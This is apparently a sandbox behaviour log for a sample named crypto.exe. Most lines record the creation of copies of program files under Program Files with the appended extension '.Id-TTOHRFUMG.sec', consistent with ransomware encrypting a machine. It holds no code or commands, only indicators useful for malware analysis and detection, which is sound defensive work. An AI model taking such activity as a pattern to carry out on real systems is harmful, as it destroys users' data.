File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01255G.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00298_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Opulent.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libpodcast_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-over-DOT.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_rtp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\33.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02158_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01291_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02405_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21336_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSHY7ES.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\COPYING.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\readme.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Baghdad.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0214098.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14594_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\en-US\setup_wm.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tijuana.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-2.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0301050.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ONLNTCOMLIB.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEBLINK.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\ParentMenuButtonIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\misc\libaudioscrobbler_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ExecutiveLetter.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01563_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107316.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\POST.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ONENOTEIRM.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonUp_Off.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WHIRL2.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libsubsusf_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Acrofx32.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDXFile_8.ico	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185818.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\XIMAGE3B.DLL.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576_91n92.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\El_Aaiun.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD10972_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02389_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14832_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00299_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239955.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ONGuide.onepkg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME01.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18211_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PULQOT98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SSGEN.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_pl.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\zipfs.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Antarctica\Mawson.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\CT_ROOTS.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1036\MSO.ACL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\mlib_image.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107258.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01568_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18218_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00790_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PAPER_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\notification_helper.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.expressions_3.4.600.v20140128-0851.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Matamoros.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\POWERPNT_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGACCBOX.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\System.AddIn.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_pressed.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00526_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSTH7EN.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10266_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\ACCTBOX.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\axvlc.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\jnwdui.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00160_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105336.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01297_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.SemiTrust.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\service.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187921.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_italic.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-previous-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00297_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_few-showers.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099195.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101860.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0171685.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18215_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OFFXML.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PICCAP98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libdav1d_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_hevc_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_thunderstorm.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\INFOPATHEDITOR_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PROTTPLN.XLS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\CALENDAR.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\notConnectedStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\javaws.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OIS_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBCAL.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01661_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libudp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\psuser_64.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-util-enumerations.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00853_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0171847.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18222_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Page.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04384_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD10307_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\alertIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Esl\AiodLite.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Detroit.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FINCL_02.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105244.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSYUBIN7.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libinflate_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\9.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbytools.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureA.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14710_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OLKIRM.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_thunderstorm.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\yo.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099201.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libtwolame_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00453_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10263_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Antarctica\Davis.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libextract_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boise.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Auckland.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00247_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105638.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00559_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\RSSITEMS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASK.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153093.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\3082\MSGR3ES.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\soundcloud.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR1B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-horizontal.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-templates.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Pontianak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174635.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\add_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\attach.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\GFX.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\navBack.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\id.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di_1.4.0.v20140414-1837.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Malta.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00417_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01160_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\SUBMIT.JS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\pa-in.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
